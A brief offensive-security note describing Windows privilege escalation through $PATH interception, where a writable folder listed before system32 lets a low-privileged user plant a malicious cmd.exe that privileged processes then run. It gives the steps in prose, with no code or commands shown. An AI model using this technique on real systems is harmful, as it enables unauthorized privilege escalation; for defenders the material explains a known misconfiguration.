Environment Variable $Path Interception

It's possible to abuse $PATH environment variable to elevate privileges if the variable:

  • contains a folder that a malicious user can write to

  • that folder precedes c:\windows\system32\

Below is an example, showing how c:\temp precedes c:\windows\system32:

Let's make sure c:\temp is (M)odifiable by low privileged users:

Let's now drop our malicious file (calc.exe in this case) into c:\temp and call it cmd.exe:

Now, the next time a high privileged user invokes cmd.exe, our malicious cmd.exe will be invoked from the c:\temp:

This can be very easily abused in environments where software deployment packages call powershell, cmd, cscript and other similar system binaries with NT SYSTEM privileges to carry out their tasks.